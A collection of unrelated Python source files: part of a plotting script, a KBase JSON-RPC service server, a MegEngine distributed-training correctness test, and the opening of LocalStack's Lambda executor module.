result_names.append("Pressure: CSF")
result_names.append("Pressure: Ven")
assert len(result_names) == num_results
fig = plt.figure()
for param_idx, param_title in enumerate(param_names):
for result_idx, result_title in enumerate(result_names):
plt_idx = result_idx * num_params+ param_idx + 1
ax = fig.add_subplot(num_results, num_params, plt_idx)
if param_title.startswith("alpha"):
ax.plot(results[:, param_idx], results[:, result_idx + num_params], 'o')
else:
ax.semilogx(results[:, param_idx], results[:, result_idx + num_params], 'o')
ax.grid()
if result_idx == 0:
ax.set_title(param_title)
if param_idx == 0:
ax.set_ylabel(result_title)
plt.show()
if __name__ == "__main__":
main()
|
ContigFilter_mleeServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from ContigFilter_mlee.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'ContigFilter_mlee'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from ContigFilter_mlee.ContigFilter_mleeImpl import ContigFilter_mlee # noqa @IgnorePep8
impl_ContigFilter_mlee = ContigFilter_mlee(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'ContigFilter_mlee'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_ContigFilter_mlee.run_ContigFilter,
name='ContigFilter_mlee.run_ContigFilter',
types=[dict])
self.method_authentication['ContigFilter_mlee.run_ContigFilter'] = 'required' # noqa
self.rpc_service.add(impl_ContigFilter_mlee.run_ContigFilter_max,
name='ContigFilter_mlee.run_ContigFilter_max',
types=[dict])
self.method_authentication['ContigFilter_mlee.run_ContigFilter_max'] = 'required' # noqa
self.rpc_service.add(impl_ContigFilter_mlee.status,
name='ContigFilter_mlee.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'ContigFilter_mlee ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_dp_correctness.py | # -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import os
import platform
import re
import subprocess
import sys
from math import ceil
import numpy as np
import pytest
import megengine as mge
import megengine.autodiff as ad
import megengine.distributed as dist
import megengine.functional as F
from megengine.device import get_default_device, set_default_device
from megengine.distributed.helper import get_device_count_by_fork
from megengine.functional.debug_param import set_conv_execution_strategy
from megengine.module import AvgPool2d, BatchNorm2d, Conv2d, Linear, Module
from megengine.optimizer import SGD
from megengine.tensor import Tensor
p_num = 4
def get_gpu_name():
try:
gpu_info = subprocess.check_output(
["nvidia-smi", "--query-gpu=gpu_name", "--format=csv,noheader"]
)
gpu_info = gpu_info.decode("ascii").split("\n")[0]
except:
gpu_info = "None"
return gpu_info
def get_cpu_name():
cpu_info = "None"
try:
cpu_info = subprocess.check_output(["cat", "/proc/cpuinfo"]).decode("ascii")
for line in cpu_info.split("\n"):
if "model name" in line:
return re.sub(".*model name.*:", "", line, 1).strip()
except:
pass
return cpu_info
def get_xpu_name():
if mge.is_cuda_available():
return get_gpu_name()
else:
return get_cpu_name()
class MnistNet(Module):
def __init__(self, has_bn=True):
super().__init__()
self.conv0 = Conv2d(1, 20, kernel_size=5, bias=True)
self.pool0 = AvgPool2d(2)
self.conv1 = Conv2d(20, 20, kernel_size=5, bias=True)
self.pool1 = AvgPool2d(2)
self.fc0 = Linear(20 * 4 * 4, 500, bias=True)
self.fc1 = Linear(500, 10, bias=True)
self.bn0 = None
self.bn1 = None
if has_bn:
self.bn0 = BatchNorm2d(20)
self.bn1 = BatchNorm2d(20)
def forward(self, x):
x = self.conv0(x)
if self.bn0:
x = self.bn0(x)
x = F.relu(x)
x = self.pool0(x)
x = self.conv1(x)
if self.bn1:
x = self.bn1(x)
x = F.relu(x)
x = self.pool1(x)
x = F.flatten(x, 1)
x = self.fc0(x)
x = F.relu(x)
x = self.fc1(x)
return x
def train(data, label, net, opt, gm):
opt.clear_grad()
with gm:
pred = net(data)
loss = F.nn.cross_entropy(pred, label)
gm.backward(loss)
opt.step()
return loss
def update_model(model_path):
"""
Update the dumped model with test cases for new reference values.
The model with pre-trained weights is trained for one iter with the test data attached.
The loss and updated net state dict is dumped.
.. code-block:: python
from test_dp_correctness import update_model
update_model('mnist_model_with_test.mge') # for gpu
update_model('mnist_model_with_test_cpu.mge') # for cpu
"""
net = MnistNet(has_bn=True)
checkpoint = mge.load(model_path)
net.load_state_dict(checkpoint["net_init"])
lr = checkpoint["sgd_lr"]
opt = SGD(net.parameters(), lr=lr)
gm = ad.GradManager().attach(
net.parameters(), callbacks=[dist.make_allreduce_cb("MEAN", dist.WORLD)]
)
data = Tensor(checkpoint["data"], dtype=np.float32)
label = Tensor(checkpoint["label"], dtype=np.int32)
opt.clear_grad()
loss = train(data, label, net=net, opt=opt)
opt.step()
xpu_name = get_xpu_name()
checkpoint.update(
{"net_updated": net.state_dict(), "loss": loss.numpy(), "xpu": xpu_name}
)
mge.serialization.save(checkpoint, model_path)
def run_test(
model_path, use_jit, use_symbolic, sublinear_memory_config=None, max_err=None,
):
"""
Load the model with test cases and run the training for one iter.
The loss and updated weights are compared with reference value to verify the correctness.
Dump a new file with updated result by calling update_model
if you think the test fails due to numerical rounding errors instead of bugs.
Please think twice before you do so.
"""
checkpoint = mge.load(model_path)
data = checkpoint["data"]
label = checkpoint["label"]
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank, max_err):
dist.init_process_group("localhost", port, p_num, rank, rank)
net = MnistNet(has_bn=True)
net.load_state_dict(checkpoint["net_init"])
lr = checkpoint["sgd_lr"]
opt = SGD(net.parameters(), lr=lr)
gm = ad.GradManager().attach(
net.parameters(), callbacks=[dist.make_allreduce_cb("MEAN", dist.WORLD)]
)
# use same data and label for all gpu's
# such that the result does not depend on number of gpu
data_train = Tensor(data)
label_train = Tensor(label)
loss = train(data_train, label_train, net, opt, gm)
np.testing.assert_allclose(loss.numpy(), checkpoint["loss"], atol=max_err)
if dist.get_rank():
return
for param, param_ref in zip(
net.state_dict().items(), checkpoint["net_updated"].items()
):
assert param[0] == param_ref[0]
np.testing.assert_allclose(param[1], param_ref[1], atol=max_err)
procs = []
for rank in range(p_num):
p = mp.Process(target=worker, args=(rank, max_err,))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 4, reason="need more gpu device")
@pytest.mark.isolated_distributed
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
def test_dp_correctness():
model_name = "mnist_model_with_test.mge"
model_path = os.path.join(os.path.dirname(__file__), model_name)
set_conv_execution_strategy("HEURISTIC_REPRODUCIBLE")
run_test(model_path, False, False, max_err=1e-5)
|
lambda_executors.py | import os
import re
import glob
import json
import time
import logging
import threading
import subprocess
import six
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file,
to_str, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue, sqs_error_to_dead_letter_queue
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_PYTHON36 = 'python3.6'
LAMBDA_RUNTIME_PYTHON37 = 'python3.7'
LAMBDA_RUNTIME_PYTHON38 = 'python3.8'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS43 = 'nodejs4.3'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_NODEJS810 = 'nodejs8.10'
LAMBDA_RUNTIME_NODEJS10X = 'nodejs10.x'
LAMBDA_RUNTIME_NODEJS12X = 'nodejs12.x'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_RUNTIME_JAVA11 = 'java11'
LAMBDA_RUNTIME_DOTNETCORE2 = 'dotnetcore2.0'
LAMBDA_RUNTIME_DOTNETCORE21 = 'dotnetcore2.1'
LAMBDA_RUNTIME_DOTNETCORE31 = 'dotnetcore3.1'
LAMBDA_RUNTIME_GOLANG = 'go1.x'
LAMBDA_RUNTIME_RUBY = 'ruby'
LAMBDA_RUNTIME_RUBY25 = 'ruby2.5'
LAMBDA_RUNTIME_PROVIDED = 'provided'
LAMBDA_EVENT_FILE = 'event_file.json'
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
EVENT_SOURCE_SQS = 'aws:sqs'
def get_from_event(event, key):
try:
return event['Records'][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = '/aws/lambda/%s' % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time_secs))
log_stream_name = '%s/[LATEST]%s' % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def execute(self, func_arn, func_details, event, context=None, version=None,
asynchronous=False, callback=None):
def do_execute(*args):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, 'eventSourceARN')
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
# return final result
return result
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
FuncThread(do_execute).start()
return None, 'Lambda executed asynchronously.'
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars={}):
process = run(cmd, asynchronous=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE,
env_vars=env_vars, stdin=True)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise Exception('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output))
return result
class ContainerInfo:
"""
Contains basic information about a docker container.
"""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = func_details.envvars.copy()
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
docker_host = config.DOCKER_HOST_FROM_CONTAINER
environment['HOSTNAME'] = docker_host
environment['LOCALSTACK_HOSTNAME'] = docker_host
environment['_HANDLER'] = handler
if func_details.timeout:
environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
# custom command to execute in the container
command = ''
# if running a Java Lambda, set up classpath arguments
if is_java_lambda(runtime):
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
save_file(os.path.join(lambda_cwd, LAMBDA_EVENT_FILE), event_body)
classpath = Util.get_java_classpath(target_file)
command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
(taskdir, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, LAMBDA_EVENT_FILE))
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
LOG.info('Running lambda cmd: %s' % cmd)
result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
